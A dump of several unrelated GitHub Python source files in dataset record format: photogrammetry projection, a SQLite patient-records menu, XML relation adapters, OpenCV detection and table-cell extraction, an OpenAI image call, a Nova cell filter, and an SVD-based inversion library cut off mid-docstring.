raise Warning( f'***ERROR*** cannot find {IMAGE_STEM} ...')\n XYZ_ = XYZ - self.OFFSET\n XYZt = df.iloc[0].PMat * np.vstack( [XYZ_,[[1.]]] )\n uv = XYZt[0,0]/XYZt[2,0], XYZt[1,0]/XYZt[2,0]\n return uv\n\n def Image2World( self, IMAGE_STEM, UV, XY_APPROX, Z ):\n ''' calculate object coordinate XYZ from image (row,col) \n given Z must be prior known e.g. from DTM '''\n def Image2World_CB( XY, IMAGE_STEM, UV, Z ):\n XYZ = np.matrix( [*XY,Z] ).T\n UV_ = np.array( self.World2Image( IMAGE_STEM, XYZ ) )\n return UV_-np.array( UV )\n X,Y = scipy.optimize.fsolve( Image2World_CB, XY_APPROX, \n args=( IMAGE_STEM,UV,Z) )\n return X,Y,Z \n\n#######################################################################################\nif __name__ == \"__main__\":\n blk = Pix4dBlock( './CA502_MEA_SmallBlock_F2' )\n df = blk.CopyRigImage( '0734' )\n print( df )\n ###################################################\n Pnt = np.matrix( [717_480.123, 1_606_280.456 , 6.789 ]).T # meter\n UV = blk.World2Image( 'S0734', Pnt ) \n np.set_printoptions(suppress=True)\n print( f'Input XYZ : {Pnt.T}' )\n print( f'Output uv : {UV}' )\n ###################################################\n xyz = blk.Image2World( 'S0734', UV, \n [ 717_500,1_606_000 ], Z=6.789 ) \n print('From image UV to XYZ:\\n', xyz )\n ###################################################\n\n","repo_name":"phisan-chula/UAV_Research","sub_path":"ObliqueCamera/Pix4D_Lib.py","file_name":"Pix4D_Lib.py","file_ext":"py","file_size_in_byte":5756,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"70330271235","text":"\"\"\"\nCSE310 SQL MediLOG Program\nPART 1\n\nThis database will store patient names, birthdays, disability/illness, and a folder date/time creation.\nPurpose: To create a medical database using SQL and Python.\nAudience: Healthcare professionals that need to updat/input patient folders data such as:\n\n- Birthdates, illness/Dissabilities (updatable).\n- Names, Patient Folder Record Creation (unique - needs to be deleted and put in again if any changes are\nneeded for that specific patient record. See README for more info).\n\n\n\"\"\"\n\nimport sqlite3\n\n# Connect to the database\nconnection = sqlite3.connect('patientrecords.db')\ncursor = connection.cursor()\n\n# Create table (if it does not already exist)\ncursor.execute(\"CREATE TABLE IF NOT EXISTS patients (name TEXT, birthday DATE, illness TEXT, creation REAL)\")\n\ndef get_name(cursor):\n cursor.execute(\"SELECT name FROM patients\")\n results = cursor.fetchall()\n if len(results) == 0:\n print(\"No names in database\")\n return None\n for i in range(len(results)):\n print(f\"{i+1} - {results[i][0]}\")\n choice = 0\n while choice < 1 or choice > len(results):\n choice = int(input(\"Name ID: \"))\n return results[choice-1][0]\n\n\nchoice = None\nwhile choice != \"5\":\n print(\"1) View Patient Folders\")\n print(\"2) Add Patient Folder\")\n print(\"3) Update Patient Folder\")\n print(\"4) Delete Patient Folder\")\n print(\"5) Quit\")\n choice = input(\"> \")\n print()\n if choice == \"1\":\n # Display patients\n cursor.execute(\"SELECT * FROM patients ORDER BY creation ASC \")\n print(\"{:>20} {:>10} {:>40} {:>40}\".format(\"Name/Middle/Last\", \"Birthday\", \"Disability/Illness\", \"Folder Date Creation\"))\n\n for record in cursor.fetchall():\n print(\"{:>20} {:>10} {:>40} {:>40}\".format(record[0], record[1], record[2], record[3]))\n \n elif choice == \"2\":\n # Add New Patient\n try:\n name = input(\"Name (i.e. First Middle Last ): \")\n birthday = input(\"Birth Date (i.e. YYYY-MM-DD ): \")\n dis_ill = input(\"Disability/Illness (i.e. No Abbreviations): \")\n creation = input(\"Folder Creation Date (i.e YYYY-MM-DD HH:MI ): \")\n values = (name, birthday, dis_ill, creation)\n cursor.execute(\"INSERT INTO patients VALUES(?,?,?,?)\", values)\n connection.commit()\n except ValueError:\n print(\"Invalid data!\")\n elif choice == \"3\":\n # Update existent patient folder\n try:\n name = get_name(cursor)\n \n if name == None:\n continue\n \n name = input(\"Name: \")\n birthday = input(\"Birth Date (i.e. YYYY-MM-DD ): \")\n dis_ill = input(\"Disability/Illness (i.e. No Abbreviations): \")\n values = (dis_ill, birthday, name ) # Make sure order is correct\n cursor.execute(\"UPDATE patients SET illness = ?, birthday = ? WHERE name = ?\", values)\n connection.commit()\n # Display updated patient folder\n # cursor.execute(\"SELECT * FROM patients ORDER BY creation DESC \")\n # print(\"{:>20} {:>10} {:>40} {:>40}\".format(\"Name/Middle/Last\", \"Birthday\", \"Disability/Illness\", \"Folder Date Creation\"))\n\n # for record in cursor.fetchall():\n # print(\"{:>20} {:>10} {:>40} {:>40}\".format(record[0], record[1], record[2], record[3]))\n \n if cursor.rowcount == 0:\n print(\"Invalid Name!\")\n except ValueError:\n print(\"Invalid data!\")\n elif choice == \"4\":\n # Delete Patient\n name = get_name(cursor)\n \n if name == None:\n continue\n values = (name, )\n cursor.execute(\"DELETE FROM patients WHERE name = ?\", values)\n connection.commit()\n print()\n # Continue improving project.\n\n# Close the database connection before exiting\nconnection.close()","repo_name":"thunderbioink/MediLOG_SPRINT_1","sub_path":"MediLOG.py","file_name":"MediLOG.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4641674668","text":"from lxml import etree\nfrom z3c.schema2xml import IXMLGenerator\nfrom zope.component import adapter\nfrom zope.interface import implementer\n\nfrom z3c.relationfield.interfaces import IRelation\nfrom z3c.relationfield.interfaces import IRelationList\nfrom z3c.relationfield.relation import TemporaryRelationValue\n\n\n@adapter(IRelationList)\n@implementer(IXMLGenerator)\nclass RelationListGenerator:\n \"\"\"Export a relation list to XML.\n \"\"\"\n\n def __init__(self, context):\n self.context = context\n\n def output(self, container, value):\n element = etree.SubElement(container, self.context.__name__)\n field = self.context.value_type\n if value is not None:\n for v in value:\n IXMLGenerator(field).output(element, v)\n\n def input(self, element):\n field = self.context.value_type\n return [\n IXMLGenerator(field).input(sub_element)\n for sub_element in element]\n\n\n@adapter(IRelation)\n@implementer(IXMLGenerator)\nclass RelationGenerator:\n \"\"\"Eport a relation to XML.\n \"\"\"\n\n def __init__(self, context):\n self.context = context\n\n def output(self, container, value):\n element = etree.SubElement(container, self.context.__name__)\n if value is not None:\n element.text = value.to_path\n\n def input(self, element):\n if element.text is None:\n return None\n path = element.text\n return TemporaryRelationValue(path)\n","repo_name":"zopefoundation/z3c.relationfield","sub_path":"src/z3c/relationfield/xml.py","file_name":"xml.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"18964127748","text":"import cv2\nimport pickle\nimport numpy as np\nfrom flag import Flag\n\nflag = Flag()\nwith open('assets/colors.h5', 'rb') as f:\n colors = pickle.loads(f.read())\n\nwith open('label.txt', 'r') as f:\n classes = f.readlines()\n\n\ndef detector(image, label):\n image = np.asarray(image * 255., np.uint8)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n indices = np.squeeze(np.max(np.max(label, axis=0, keepdims=True), axis=1, keepdims=True))\n indices = np.where(indices > 0.5)[0]\n\n for i in indices:\n output = np.asarray(label[:, :, i], dtype=np.float)\n output[output > flag.threshold] = 255.\n output[output <= flag.threshold] = 0.\n output = np.asarray(output, dtype=np.uint8)\n kernel = np.ones((2, 2), np.float32) / 4\n output = cv2.filter2D(output, -1, kernel)\n # cv2.imshow('out', cv2.resize(output, (256, 256)))\n # cv2.waitKey(0)\n _, contours, _ = cv2.findContours(output, cv2.RETR_LIST, cv2.CHAIN_APPROX_TC89_L1)\n\n for contour in contours:\n # print(contour)\n col_wise = contour[:, :, 0]\n row_wise = contour[:, :, 1]\n\n x1 = min(col_wise)[0] / flag.y_size * flag.x_size\n y1 = min(row_wise)[0] / flag.y_size * flag.x_size\n x2 = max(col_wise)[0] / flag.y_size * flag.x_size\n y2 = max(row_wise)[0] / flag.y_size * flag.x_size\n # print(x1, y1, x2, y2)\n c = colors[i]\n image = cv2.rectangle(image, (int(x1), int(y1)), (int(x2), int(y2)), (int(c[0]), int(c[1]), int(c[2])), 2)\n # print('class =', classes[i-1])\n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(image, classes[i - 1][:-1], (int(x1), int(y1)), font, .8, (int(c[0]), int(c[1]), int(c[2])), 2,\n cv2.LINE_AA)\n\n return image\n\n\nif __name__ == '__main__':\n flag = Flag()\n images = np.load('dataset/valid_x.npy')\n labels = np.load('dataset/valid_y.npy')\n # print(images.shape)\n image = images[100]\n label = labels[100]\n image = detector(image, label)\n cv2.imshow('image', image)\n cv2.waitKey(0)\n","repo_name":"MahmudulAlam/Object-Detection-Using-GPM","sub_path":"detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"36337559865","text":"import numpy as np\nimport cv2\nfrom .show_image import show_image\nfrom .global_variables import *\n\ndef attempt_image_improvement(cell):\n cell = cv2.GaussianBlur(cell,(7,7),0)\n cell = cv2.addWeighted(cell, 2.4, np.zeros(cell.shape, cell.dtype), 0, -180) #2,-120\n kernel = np.array([[-1,-1,-1],\n [-1, 9,-1],\n [-1,-1,-1]])\n cell = cv2.filter2D(cell, -1, kernel)\n return cell\n\ndef get_cells(img, linesv, linesh):\n pointsv = []\n for line in linesv:\n [x1, y1, x2, y2] = line[0]\n pointsv.append(x1)\n pointsv.sort()\n\n pointsh = []\n for line in linesh:\n [x1, y1, x2, y2] = line[0]\n pointsh.append(y1)\n pointsh.sort()\n\n cells = []\n for i in range(len(pointsh)):\n row = []\n if i == len(pointsh) - 1:\n continue\n for x in range(len(pointsv)):\n if x == len(pointsv) - 1:\n continue\n cell = img[pointsh[i] + FROM_LINE_OFFSET:pointsh[i + 1] +\n FROM_LINE_OFFSET, pointsv[x]:pointsv[x + 1]].copy()\n if ATTEMPT_IMAGE_IMPROVEMENT:\n cell = attempt_image_improvement(cell)\n #show_image(cell, \"Particular cell\")\n row.append(cell)\n cells.append(row)\n return cells\n\n\ndef find_correct_line(p1, p2, lines):\n if p2 < p1:\n self.assertTrue(False, 'WeirdFormating')\n\n # If the line goes less than a third into cell it cannot be considered a valid line.\n allowed_offset = abs(p1 - p2) / 3\n for line in lines:\n [x1, y1, x2, y2] = line\n if (y1 < (p1 + allowed_offset) and y2 < (p1 + allowed_offset)) or (y1 > (p2 - allowed_offset) and y2 > (p2 - allowed_offset)):\n continue\n else:\n return line\n print(\"Found no correct lines!\")\n print(p1, p2)\n print(y1, y2, lines)\n\n\ndef get_cells_irreg(img, linesv, linesh):\n linesv = sorted(linesv, key=lambda x: x[0][0])\n linesh = sorted(linesh, key=lambda x: x[0][1])\n\n cells = []\n for i in range(len(linesh)):\n row = []\n if i == len(linesh) - 1:\n continue\n [_, iy1, _, _] = linesh[i][0]\n [_, iyy1, _, _] = linesh[i + 1][0]\n for z in range(len(linesv)):\n if z == len(linesv) - 1:\n continue\n # First line\n line = find_correct_line(iy1, iyy1, linesv[z])\n if line == None:\n continue\n else:\n [zx1, _, _, _] = line\n # Second line\n # If the first line isn't valid keep looking\n for iteration in range(len(linesv)):\n line = find_correct_line(iy1, iyy1, linesv[z + iteration + 1])\n if line == None:\n continue\n else:\n [zxx1, _, _, _] = line\n break\n\n cell = img[iy1 + FROM_LINE_OFFSET:iyy1 +\n FROM_LINE_OFFSET, zx1:zxx1].copy()\n if ATTEMPT_IMAGE_IMPROVEMENT:\n cell = attempt_image_improvement(cell)\n #show_image(cell, \"Particular cell\")\n row.append(cell)\n cells.append(row)\n return cells\n","repo_name":"AlexanderBergkvist/ExcelReader","sub_path":"libs/get_cells.py","file_name":"get_cells.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"25023734657","text":"import os\nimport openai\n\nopenai.api_key = os.getenv(\"OPENAI-KEY\")\n\nuser_prompt = \"city during the night\"\n\nresponse = openai.Image.create(\n prompt = user_prompt, \n n = 1, \n size = \"1024x1024\"\n) \n\nimage_url = response['data'][0][\"url\"]\n\nprint(image_url)\n","repo_name":"shriya1111/evadb_project_image_generation","sub_path":"image_generate.py","file_name":"image_generate.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"689179592","text":"from nova.cells import filters\nfrom nova.cells import utils as cells_utils\nfrom nova import db\nfrom nova import exception\nfrom nova.openstack.common import log as logging\n\nLOG = logging.getLogger(__name__)\n\n\nclass RAXNearFarCellFilter(filters.BaseCellFilter):\n \"\"\"Rackspace near/far instance filter.\n Check for 'near' or 'far' in the scheduler_hints dict. Values\n are instance_uuids.\n\n 'near' an instance_uuid needs to target the build for the same\n cell as instance_uuid.\n\n 'far' means to target the build for a different cell than\n instance_uuid.\n \"\"\"\n\n @staticmethod\n def _get_cell_name(context, instance_uuid, filter_type):\n try:\n instance = db.instance_get_by_uuid(context,\n instance_uuid)\n except exception.InstanceNotFound:\n reason = _(\"Instance '%(instance_uuid)s' not found for \"\n \"'%(filter_type)s' scheduler_hint\") % locals()\n raise exception.CellsFilterError(reason=reason)\n cell_name = instance['cell_name']\n if not cell_name:\n reason = _(\"Instance '%(instance_uuid)s' is not assigned to a \"\n \"cell for '%(filter_type)s' scheduler_hint\") % locals()\n raise exception.CellsFilterError(reason=reason)\n return cell_name\n\n @staticmethod\n def _find_cell(cell_name, cells_manager, routing_path):\n try:\n (next_hop_name, host) = cells_utils.cell_name_for_next_hop(\n cell_name, routing_path)\n except exception.CellRoutingInconsistency:\n return None\n if not next_hop_name:\n return cells_manager.my_cell_info\n return cells_manager.child_cells.get(next_hop_name)\n\n def filter_cells(self, cells, filter_properties):\n context = filter_properties['context']\n scheduler_hints = filter_properties.get('scheduler_hints')\n if not scheduler_hints:\n return\n routing_path = filter_properties['routing_path']\n cells_manager = filter_properties['scheduler'].manager\n\n # First, we need to turn 'near' and 'far' into 'same_cell'\n # and 'different_cell' hints. When we're routing down,\n # we may have some routing-only hops, so they will not be\n # able to look up instances.\n near_uuid = scheduler_hints.pop('near', None)\n if near_uuid:\n cell_name = self._get_cell_name(context, near_uuid, 'near')\n scheduler_hints['same_cell'] = cell_name\n far_uuid = scheduler_hints.pop('far', None)\n if far_uuid:\n cell_name = self._get_cell_name(context, far_uuid, 'far')\n scheduler_hints['different_cell'] = cell_name\n cell = self._find_cell(cell_name,\n cells_manager, routing_path)\n if cell:\n # We should also try to filter DCZONE if we have it.\n dczone = cell.capabilities.get('DCZONE')\n if dczone:\n scheduler_hints['different_dczone'] = dczone[0]\n\n # Now we can look at 'same_cell', 'different_cell', and\n # 'different_dczone'\n same_cell = scheduler_hints.get('same_cell')\n if same_cell:\n LOG.info(_(\"Forcing direct route to %(same_cell)s because \"\n \"of 'same_cell' scheduler hint\"), locals())\n return {'action': 'direct_route',\n 'target': same_cell}\n different_cell = scheduler_hints.get('different_cell')\n if different_cell:\n hops_left = (different_cell.count(\n cells_utils.PATH_CELL_SEP) - routing_path.count(\n cells_utils.PATH_CELL_SEP))\n cell = self._find_cell(different_cell,\n cells_manager, routing_path)\n # If there's only 1 hop left, we need to remove\n # this cell.. otherwise it's okay to include it,\n # because the next cell down can filter.\n #\n # Also, if we're the cell, remove ourselves from\n # the set. This should be the case if hops_left == 0\n if cell and hops_left <= 1:\n try:\n cell_name = cell.name\n LOG.info(_(\"Removing cell %(cell)s because \"\n \"of 'different_cell' scheduler_hint of \"\n \"'%(different_cell)s'\"), locals())\n cells.remove(cell)\n except KeyError:\n pass\n if not cells:\n return\n\n different_dczone = scheduler_hints.get('different_dczone')\n if different_dczone:\n matching_dczone_cells = [cell for cell in cells\n if cell.capabilities.get('DCZONE', [None])[0] ==\n different_dczone]\n # Remove cells that match the DCZONE\n if matching_dczone_cells:\n LOG.info(_(\"Removing cells %(matching_dczone_cells)s \"\n \"because of 'different_dczone' scheduler_hint \"\n \"of %(different_dczone)s\"), locals())\n return {'drop': matching_dczone_cells}\n","repo_name":"sridevikoushik31/nova","sub_path":"nova/cells/filters/rax_near_far.py","file_name":"rax_near_far.py","file_ext":"py","file_size_in_byte":5183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17007063973","text":"\"\"\"Module to offer the Core functionalities for the ill-posed inversion calculation.\n\nThis module includes the usefull functions or base classes for the ill-posed inversion calculation\nbased on Singular Value Decomposition (SVD) method.\n\"\"\"\nfrom __future__ import annotations\n\nfrom collections.abc import Callable\n\nfrom numpy import arange, asarray, floating, ndarray, ones_like, sqrt\nfrom numpy.linalg import norm\nfrom scipy.optimize import basinhopping\nfrom scipy.sparse import csc_matrix as sp_csc_matrix\nfrom scipy.sparse import csr_matrix as sp_csr_matrix\nfrom scipy.sparse import issparse\nfrom sksparse.cholmod import cholesky\n\nfrom .tools.spinner import DummySpinner, Spinner\n\n__all__ = [\"_SVDBase\", \"compute_svd\"]\n\n\nclass _SVDBase:\n \"\"\"Base class for inversion calculation based on Singular Value Decomposition (SVD) method.\n\n .. note::\n\n This class is designed to be inherited by subclasses which define the objective function\n to optimize the regularization parameter :math:`\\\\lambda` using the\n :obj:`~scipy.optimize.basinhopping` function.\n\n\n Parameters\n ----------\n s : vector_like\n singular values of :math:`A`\n like :math:`\\\\sigma = (\\\\sigma_1, \\\\sigma_2, ...) \\\\in \\\\mathbb{R}^r`\n u : array_like\n left singular vectors of :math:`A`\n like :math:`U = (u_1, u_2, ...) \\\\in \\\\mathbb{R}^{m\\\\times r}`\n basis : array_like\n inverted solution basis :math:`\\\\tilde{V} \\\\in \\\\mathbb{R}^{n\\\\times r}`.\n Here, :math:`\\\\tilde{V} = L^{-1}V`, where :math:`V\\\\in\\\\mathbb{R}^{n\\\\times r}` is\n the right singular vectors of :math:`A` and :math:`L^{-1}` is the inverse of\n regularization operator :math:`L \\\\in \\\\mathbb{R}^{n\\\\times n}`.\n data : vector_like\n given data for inversion calculation forms as a vector in :math:`\\\\mathbb{R}^m`\n\n Notes\n -----\n This class offers the calculation of the inverted solution defined by\n\n .. math::\n\n Ax = b,\n\n where :math:`A` is a matrix in :math:`\\\\mathbb{R}^{m\\\\times n}`, :math:`x` is a solution vector\n in :math:`\\\\mathbb{R}^n` and :math:`b` is a given data vector in :math:`\\\\mathbb{R}^m`.\n\n The solution is usually calculated by the least square method, which is defined by\n\n .. math::\n\n x_\\\\text{ls} :&= \\\\text{argmin} \\\\{ ||Ax-b||^2 \\\\} \\\\\n\n &= ( A^\\\\mathsf{T} A )^{-1} A^\\\\mathsf{T} b.\n\n This problem is often ill-posed, so the solution is estimated by adding the regularization term\n like :math:`||Lx||^2` to the right hand side of the equation:\n\n .. math::\n\n x_\\\\lambda :&= \\\\text{argmin} \\\\{ ||Ax-b||^2 + \\\\lambda ||Lx||^2 \\\\} \\\\\n\n &= (A^\\\\mathsf{T} A + \\\\lambda L^\\\\mathsf{T} L)^{-1} A^\\\\mathsf{T}\\\\ b,\n\n where :math:`\\\\lambda\\\\in\\\\mathbb{R}` is the reguralization parameter and\n :math:`L \\\\in \\\\mathbb{R}^{n\\\\times n}` is a matrix operator in regularization term\n (e.g. laplacian).\n\n The SVD components are based on the following equation:\n\n .. math::\n\n U\\\\Sigma V^\\\\mathsf{T}\n = \\\\begin{pmatrix}\n u_1 & \\\\cdots & u_r\n \\\\end{pmatrix}\n \\\\ \\\\text{diag}(\\\\sigma_1,..., \\\\sigma_r)\n \\\\ \\\\begin{pmatrix}\n v_1 & \\\\cdots & v_r\n \\\\end{pmatrix}^\\\\mathsf{T}\n = AL^{-1}\n\n Using this components allows to reconstruct the estimated solution :math:`x_\\\\lambda` as follows:\n\n .. math::\n\n x_\\\\lambda &= \\\\tilde{V}W\\\\Sigma^{-1}U^\\\\mathsf{T}b \\\\\\\\\n &= \\\\begin{pmatrix} \\\\tilde{v}_1 & \\\\cdots & \\\\tilde{v}_r \\\\end{pmatrix}\n \\\\ \\\\text{diag}(w_1(\\\\lambda), ..., w_r(\\\\lambda))\n \\\\ \\\\text{diag}(\\\\sigma_1^{-1}, ..., \\\\sigma_r^{-1})\n \\\\begin{pmatrix}\n u_1^\\\\mathsf{T}b \\\\\\\\\n \\\\vdots \\\\\\\\\n u_r^\\\\mathsf{T}b\n \\\\end{pmatrix} \\\\\\\\\n &= \\\\sum_{i=0}^{r} w_i(\\\\lambda)\\\\frac{u_i^\\\\mathsf{T} b}{\\\\sigma_i} \\\\tilde{v}_i,\n\n where :math:`r` is the rank of :math:`A` (:math:`r \\\\leq \\\\min(m, n)`), :math:`w_i` is\n the window function, :math:`\\\\sigma_i` is the singular value of :math:`A` and\n :math:`\\\\tilde{v}_i` is a :math:`i`-th column vector of the inverted solution basis:\n :math:`\\\\tilde{V} = L^{-1}V \\\\in \\\\mathbb{R}^{n\\\\times r}`.\n\n :math:`w_i` is defined as follows:\n\n .. math::\n\n w_i(\\\\lambda) \\\\equiv \\\\frac{1}{1 + \\\\lambda / \\\\sigma_i^2}.\n \"\"\"\n\n def __init__(self, s, u, basis, data=None):\n # validate SVD components\n s = asarray(s, dtype=float)\n if s.ndim != 1:\n raise ValueError(\"s must be a vector.\")\n\n u = asarray(u, dtype=float)\n if u.ndim != 2:\n raise ValueError(\"u must be a matrix.\")\n if s.size != u.shape[1]:\n raise ValueError(\"the number of columns of u must be same as that of singular values\")\n\n # set SVD components\n self._s = s\n self._u = u\n\n # set inverted solution basis\n self.basis = basis\n\n # set data values\n if data is not None:\n self.data = data\n else:\n self._data = None\n\n # set initial regularization parameter\n self._beta = 0.0\n\n # set initial optimal regularization parameter\n self._lambda_opt: float | None = None\n\n def __repr__(self):\n return (\n f\"{self.__class__.__name__}\"\n f\"(s:{self._s.shape}, u:{self._u.shape}, basis:{self._basis.shape})\"\n )\n\n def __getstate__(self):\n \"\"\"Return the state of the _SVDBase object.\"\"\"\n state = self.__dict__.copy()\n return state\n\n def __setstate__(self, state):\n \"\"\"Set the state of the _SVDBase object.\"\"\"\n self.__dict__.update(state)\n\n def __reduce__(self):\n return self.__new__, (self.__class__,), self.__getstate__()\n\n @property\n def s(self) -> ndarray:\n \"\"\"Singular values of :math:`A`\n\n Singular values form a vector array like\n :math:`\\\\sigma = (\\\\sigma_1, \\\\sigma_2,...)\\\\in\\\\mathbb{R}^r`\n \"\"\"\n return self._s\n\n @property\n def u(self) -> ndarray:\n \"\"\"Left singular vectors of :math:`A`.\n\n Left singular vactors form a matrix containing column vectors like\n :math:`U = (u_1, u_2,...)\\\\in\\\\mathbb{R}^{m\\\\times r}`\n \"\"\"\n return self._u\n\n @property\n def basis(self) -> ndarray:\n \"\"\"The inverted solution basis :math:`\\\\tilde{V} \\\\in \\\\mathbb{R}^{n\\\\times r}`.\n\n If the regularization term is described as :math:`||Lx||^2`, then\n :math:`\\\\tilde{V} = L^{-1}V \\\\in \\\\mathbb{R}^{n\\\\times r}`,\n where :math:`V\\\\in\\\\mathbb{R}^{n\\\\times r}` is the right singular vectors of :math:`A` and\n :math:`L^{-1}` is the inverse of regularization operator\n :math:`L \\\\in \\\\mathbb{R}^{n\\\\times n}`.\n \"\"\"\n return self._basis\n\n @basis.setter\n def basis(self, mat):\n if not isinstance(mat, ndarray):\n raise TypeError(\"basis must be a numpy.ndarray\")\n if mat.shape[1] != self._s.size:\n raise ValueError(\n \"the number of columns of inverted solution basis must be same as that of singular values\"\n )\n self._basis = mat\n\n @property\n def data(self) -> ndarray:\n \"\"\"Given data for inversion calculation.\"\"\"\n return self._data\n\n @data.setter\n def data(self, value):\n data = asarray(value, dtype=float)\n if data.ndim != 1:\n raise ValueError(\"data must be a vector.\")\n if data.size != self._u.shape[0]:\n raise ValueError(\"data size must be the same as the number of rows of U matrix\")\n self._data = data\n self._ub = self._u.T @ data # U^T b\n\n # -------------------------------------------------------------------------\n # Define methods calculating some norms, window function, etc...\n # -------------------------------------------------------------------------\n\n def w(self, beta: float) -> ndarray:\n \"\"\"Calculate window function using regularization parameter :math:`\\\\lambda`.\n\n The window function is defined as follows:\n\n .. math::\n\n w(\\\\lambda) \\\\equiv \\\\frac{1}{1 + \\\\lambda / \\\\sigma^2},\n\n where :math:`\\\\sigma` is the singular value of :math:`A`.\n Because :math:`\\\\sigma` is a vector, the window function is also a vector.\n\n Parameters\n ----------\n beta\n regularization parameter\n\n Returns\n -------\n numpy.ndarray (N, )\n vector of window function\n \"\"\"\n return 1.0 / (1.0 + beta / self._s**2.0)\n\n def rho(self, beta: float) -> floating:\n \"\"\"Calculate squared residual norm: :math:`\\\\rho = ||Ax_\\\\lambda - b||^2`.\n\n :math:`\\\\rho` can be calculated with SVD components as follows:\n\n .. math::\n\n \\\\rho &= \\\\left\\\\|\n U (I_r - W) U^\\\\mathsf{T} b\n \\\\right\\\\|^2\\\\\\\\\n &= \\\\left\\\\|\n \\\\begin{pmatrix} u_1 & \\\\cdots & u_r \\\\end{pmatrix}\n (I_r - W) U^\\\\mathsf{T} b\n \\\\right\\\\|^2\\\\\\\\\n &= \\\\left\\\\|\n (I_r - W) U^\\\\mathsf{T} b\n \\\\right\\\\|^2\n \\\\quad(\n \\\\because U^\\\\mathsf{T}U = I_r,\n \\\\quad\\\\text{i.e.}\\\\quad u_i\\\\cdot u_j = \\\\delta_{ij}\n ),\n\n where :math:`W = \\\\text{diag}(w_1(\\\\lambda), ..., w_r(\\\\lambda))`\n and :math:`w_i(\\\\lambda)` is the window function.\n\n Parameters\n ----------\n beta\n regularization parameter\n\n Returns\n -------\n numpy.floating\n squared residual norm\n \"\"\"\n return norm((1.0 - self.w(beta)) * self._ub) ** 2.0\n\n def eta(self, beta: float) -> floating:\n \"\"\"Calculate squared regularization norm: :math:`\\\\eta = ||Lx_\\\\lambda||^2`\n\n :math:`\\\\eta` can be calculated with SVD components as follows:\n\n .. math::\n\n \\\\eta &= \\\\left\\\\|\n V W \\\\Sigma^{-1} U^\\\\mathsf{T} b\n \\\\right\\\\|^2\\\\\\\\\n &= \\\\left\\\\|\n \\\\begin{pmatrix} v_1 & \\\\cdots & v_r \\\\end{pmatrix}\n W \\\\Sigma^{-1} U^\\\\mathsf{T} b\n \\\\right\\\\|^2\\\\\\\\\n &= \\\\left\\\\|\n W \\\\Sigma^{-1} U^\\\\mathsf{T} b\n \\\\right\\\\|^2\n \\\\quad(\n \\\\because V^\\\\mathsf{T}V = I_r,\n \\\\quad\\\\text{i.e.}\\\\quad v_i\\\\cdot v_j = \\\\delta_{ij}\n ),\n\n where :math:`W = \\\\text{diag}(w_1(\\\\lambda), ..., w_r(\\\\lambda))`\n and :math:`w_i(\\\\lambda)` is the window function.\n\n Parameters\n ----------\n beta\n regularization parameter\n\n Returns\n -------\n numpy.floating\n squared regularization norm\n \"\"\"\n return norm((self.w(beta) / self._s) * self._ub) ** 2.0\n\n def eta_diff(self, beta: float) -> floating:\n \"\"\"Calculate differential of `eta`: :math:`\\\\eta' = \\\\frac{d\\\\eta}{d\\\\lambda}`\n\n Before calculating :math:`\\\\eta'`, let us calculate the differential of window function\n matrix :math:`W = \\\\text{diag}(w_1(\\\\lambda), ..., w_r(\\\\lambda))` using SVD components:\n\n .. math::\n\n \\\\frac{dW}{d\\\\lambda}\n &= \\\\frac{d}{d\\\\lambda}\n \\\\text{diag}\\\\left(..., \\\\frac{1}{1 + \\\\lambda/\\\\sigma_i^2}, ...\\\\right)\n \\\\quad \\\\left(\\\\because w_i(\\\\lambda) = \\\\frac{1}{1 + \\\\lambda/\\\\sigma_i^2} \\\\right)\\\\\\\\\n &= \\\\text{diag}\\\\left(\n ..., -\\\\frac{\\\\sigma_i^{-2}}{(1 + \\\\lambda/\\\\sigma_i^2)^2}, ...\n \\\\right)\\\\\\\\\n &= - W^2 \\\\Sigma^{-2}\\\\\\\\\n &= - \\\\frac{1}{\\\\lambda} W (I_r - W). \\\\quad(\\\\because I_r - W = \\\\lambda W \\\\Sigma^{-2})\n\n Therefore :math:`\\\\eta'` can be calculated as follows:\n\n .. math::\n\n \\\\eta' &= \\\\frac{d}{d\\\\lambda} \\\\left\\\\|W\\\\Sigma^{^-1}U^\\\\mathsf{T}b\\\\right\\\\|\\\\\\\\\n &= a^\\\\mathsf{T}\\\\left(\\\\frac{d}{d\\\\lambda} W^2 \\\\right) a\n \\\\quad(\\\\because a\\\\equiv\\\\Sigma^{-1}U^\\\\mathsf{T}b, \\\\ W^2 = W^\\\\mathsf{T}W)\\\\\\\\\n &= 2a^\\\\mathsf{T}W\\\\frac{dW}{d\\\\lambda}a\\\\\\\\\n &= -\\\\frac{2}{\\\\lambda} a^\\\\mathsf{T} W^2 (I_r - W) a\\\\\\\\\n &= -\\\\frac{2}{\\\\lambda} a^\\\\mathsf{T} W^\\\\mathsf{T} (I_r - W)^{\\\\mathsf{T}/2}\n (I_r - W)^{1/2} W a\\\\\\\\\n &= -\\\\frac{2}{\\\\lambda}\n \\\\left\\\\|\n \\\\sqrt{I_r - W}\\\\ W \\\\Sigma^{-1} U^\\\\mathsf{T} b\n \\\\right\\\\|^2.\n\n\n Parameters\n ----------\n beta\n regularization parameter\n\n Returns\n -------\n numpy.floating\n differential of squared regularization norm\n \"\"\"\n w = self.w(beta)\n return (-2.0 / beta) * norm(sqrt(1.0 - w) * (w / self._s) * self._ub) ** 2.0\n\n def residual_norm(self, beta: float) -> ndarray:\n \"\"\"Return the residual norm: :math:`\\\\sqrt{\\\\rho} = ||Ax_\\\\lambda - b||`\n\n Parameters\n ----------\n beta\n reguralization parameter\n\n Returns\n -------\n float\n residual norm\n \"\"\"\n return sqrt(self.rho(beta))\n\n def regularization_norm(self, beta: float) -> float:\n \"\"\"Return the 